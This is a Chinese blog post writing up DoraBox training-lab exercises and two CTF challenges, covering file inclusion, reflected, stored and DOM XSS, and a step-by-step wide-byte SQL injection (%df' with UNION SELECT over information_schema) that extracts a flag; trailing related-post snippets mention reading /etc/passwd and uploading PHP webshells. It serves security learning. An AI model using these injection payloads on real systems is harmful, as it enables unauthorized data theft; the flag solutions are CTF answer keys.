DoraBox——文件包含、XSS跨站、两道ctf题

最新推荐文章于 2024-01-27 00:05:53 发布
最新推荐文章于 2024-01-27 00:05:53 发布
阅读量461 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46204746/article/details/104784817
版权

1.任意文件包含
这道题没有什么特别的限制,代码中使用include直接包含的,直接输入:txt.txt 在这里插入图片描述
2.目录限制文件包含
随便输入:php,发现include()里与原来相比多了一个“./”,所以直接访问./txt.txt在这里插入图片描述
3.XSS 反射型
它指的是攻击者向目标网站中插入恶意代码(但恶意代码并未保存在目标网站中),只有当用户浏览该页面时,通过欺骗用户让用户自己点击链接(攻击者事先准备好的链接),才会触发恶意代码进行攻击。
输入框中输入:
在这里插入图片描述在这里插入图片描述
查看源码进行比较,发现输入的代码被插入了源代码中,但是每次重新进入网页时,如果不输入代码,则源码中并不会出现第一次插入的代码在这里插入图片描述在这里插入图片描述
4.XSS 存储型
与反射型类似,但是存储型是只要用户浏览了包含此恶意代码的页面,就会触发恶意代码进行执行,并且存储型XSS是永久存储在服务器中的。
向输入框中输入:
在这里插入图片描述
与反射型不同的是,当我重新进入页面时,不需要再次输入,就会直接弹框,并且查看源码会发现,插入的代码并不会因为重新进入页面就从源码中消失。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.XSS DOM型
还是向输入框中输入:
在这里插入图片描述
回车后出现弹窗
在这里插入图片描述
查看源码,发现输入的代码并未插入源码中,但是源码中有之前两种类型中没有的代码,这道题目前还不会。。。
在这里插入图片描述
6.sql injection 3 (SQL注入题)
输入:id=1’,发现被转义了,使用%df’宽字节注入
输入:id=1%df’,报错在这里插入图片描述
输入:id=1%df’or 1=1%23,回显正常
开始查询字段数,输入:id=1%df’order by 2%23,回显正常
输入:id=1%df’order by 3 %23,报错,所以一共有2个字段在这里插入图片描述在这里插入图片描述
判断字段中有输出的位置:id=-1%df’union select 1,2 %23在这里插入图片描述
开始爆数据库:id=-1%df’union select 1,database() %23在这里插入图片描述
开始爆表名:id=-1%df’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572)%23
(0x7361652d6368696e616c6f766572为库名sae-chinalover转化成的16进制数)
在这里插入图片描述
根据提示,开始爆表ctf4当中的所有字段名:id=-1%df’union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x63746634)%23
在这里插入图片描述
爆ctf4表中的字段flag中的数据:id=-1%df’union select 1,flag from ctf4%23在这里插入图片描述
得到flag
7.easy!
在这里插入图片描述
随便找一个base64解密工具,解密后得到flag: nctf{this_is_base64_encode}

发际线预备队
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS与CSRF两种攻击总结
02-26
在那个年代,大家一般用拼接字符串的方式来构造动态SQL语句创建应用,于是SQL注入成了很流行的攻击方式。在这个年代,参数化查询[1]...XSS全称“脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是
DoraBox靶场(三)文件包含
Lorezon的博客
03-17 240
任意文件包含 在靶场目录下有个txt文件,可以直接读取 目录限制文件包含 源码有不同的地方 "…/"的含义就是返回上一目录,可以用这种返回层级目录的方式得到信息。 因为靶场的phpinfo文件在两个上层目录,所以输入…/…/phpinfo.php ...
DoraBox-文件包含 文件上传
baynk的博客
11-25 1205
0x00 前言 文件包含这个就不用多说了,玩了很多了,各个靶场都会有的东西。 文件上传是getshell的最常用手法之一,有时也会配合文件包含一起getshell,看这个吧,很全,Upload-labs。 0x01 任意文件包含 用的include()函数,比如我这里可以读/etc/passwd 没有什么很特别的限制 0x02 目录限制文件包含 发现多了一个./,应该只能用相对路径来完成...
DoraBox实战】————4、文件包含分析与研究
Fly_鹏程万里
08-07 667
文件包含简介 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。 程序开发人员都希望代码更加灵活,所以通常会将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含漏洞在PHP Web Application中居多,而在JSP,ASP...
ctf(2)-攻防世界web高手进阶区
weixin_46938584的博客
12-06 1467
baby_web web请求头中的location作用 步骤 1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag。 Training-WWW-Robots 过于简单,略 ...
网络安全CTF ——web_文件包含
weixin_63274653的博客
01-27 377
通过查看php.ini文件,发现allow_url_fopen 和 allow_url_include都是打开的,所以可以判断是远程文件包含。这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag。指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件。直接读取目标机上的Flag文件,通常可以通过操纵变量去读取。文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含。通过给定的URL查看源码。
xss脚本攻击-运维安全详细笔记
06-30
xss脚本攻击知识点总结 xss脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss脚本攻击的知识点总结:...
XSS脚本攻击剖析与防御.pdf
05-16
XSS脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
36-36.XSS脚本攻击课程介绍.mp4
最新发布
05-10
36-36.XSS脚本攻击课程介绍.mp4
BWVS-文件包含漏洞
baynk的博客
11-25 482
0x00 前言 这次的文件包含内容有点多,一点点来,哪个简单先来哪个。 0x01 任意文件包含漏洞 /bug/file_include/any_include.php 输入/etc/passwd直接来了 0x02 目录限制文件包含 /bug/file_include/include_1.php 怎么越做越像DoraBox。。。。 直接输入/etc/passwd没有回显,从名字来看大概率是加了...
文件包含技巧拓展】————1、常见文件包含发生场景与防御
Fly_鹏程万里
01-30 1732
前言 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,希望对大家攻击方法和防御上有帮助。如果内容有错误纰漏,请留言指正哦~ 一、 文件包含概念 1、 概念 "代码注入"...
目录穿越及文件包含漏洞
weixin_45007073的博客
01-31 7489
目录穿越概念 目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹、执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。 目录穿越的漏洞危害 攻击者可以使用目录穿越攻击来查找、执行或存取Web应用程序所在的根目录以外的文件夹。如果目录穿越攻击成功,黑客就可以执行破坏性的命令来攻击网 文件操作漏洞的分类 代码展示 先来简单展示一下目录穿越的原理,先在当前目录下新建一个file文件夹,里面建一个1.tx
web安全之目录遍历攻击,文件包含
qidiandexiaowu
10-17 1713
目录0×00 目录遍历攻击 0×00 目录遍历攻击 目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。 目录遍历攻击可能从两个方面产生: ①利用web应用代码实行目录遍历攻击 ②利用web服务器进行目录遍历攻击 原理: 程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。 读取文件的url: http://127.0.0.1/my.jsp?file=xxx.html 如果服务器允
文件包含与目录遍历
土拨鼠挖洞中的博客
10-06 2771
directory traversal(目录遍历): 使用者通过这个漏洞,修改url、参数变量,从而读取web根目录以外的文件内容;   file include: 开发员的include函数对输入变量过滤不够严格,导致系统文件,错误包含 一、远程文件包含 远程文件包含(RFI)发生在web应用程序下载并执行远程文件。这些远程文件通常的形式获得的HTTP或FTPURI作为一个web应用...
DoraBox-代码/命令 其他
baynk的博客
11-25 977
0x00 前言 DoraBox最后一篇了,把其余的都写进来。感觉这个靶场弄的好快。。。 0x01 任意代码执行 输入test得到如下报错,原来用的是assert函数 那这里直接就可以使用phpinfo()了。 0x02 任意命令执行 运行cat /etc/passwd出来的结果。。 只有一行输出,其实这个时候干啥都可以,比如echo xxx > /var/www/html/xxxx...
【合天网安】DoraBox文件包含及任意文件读取漏洞
hehigoxqc606的博客
09-01 683
【合天网安实验室】DoraBox文件包含及任意文件读取漏洞 目的: 过DoraBox靶场系列练习,学习任意文件包含、目录限制文件包含及任意文件读取漏洞的利用过程。 实验过程: 1.确保Apache、MySQL服务正常开启 2、查看.txt文本内容 3.使用include直接包含,可以直接进行任意文件读取 4.在file输入.txt文档路径,点击【submit】,显示以下内容 成功包含并执行了.txt的PHP代码 5、目录限制文...
DoraBox xss&文件包含
B_roin的博客
03-09 481
XSS xss直接利益就是拿到用户浏览器的cookie xss传播性强,间接攻击 xss漏洞攻击本质: 1.恶意代码未经过滤,与网正常的代码混在一起 2.浏览器无法分辨哪些脚本可信,导致恶意脚本被执行 可标签 <img’> 标签scr属性 <script’> 标签src属性 <link’> 标签href属性 css中<img’> 标签...
DoraBox靶场(四)文件上传
Lorezon的博客
03-20 280
任意文件上传 这关没啥说的,什么文件都可以。 JS限制文件上传 上传php文件,提示不允许上传,并给出了允许上传的文件类型。 先上传jpg文件,再抓包拦截改文件类型。 成功上传了php,蚁剑连接。 MIME限制上传 上传php文件,显示文件类型不正确。 经过测试,jpg文件可以成功上传。 抓包看php和jpg有什么不同。 两者的Content-Type值不相同。 把php的Content-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值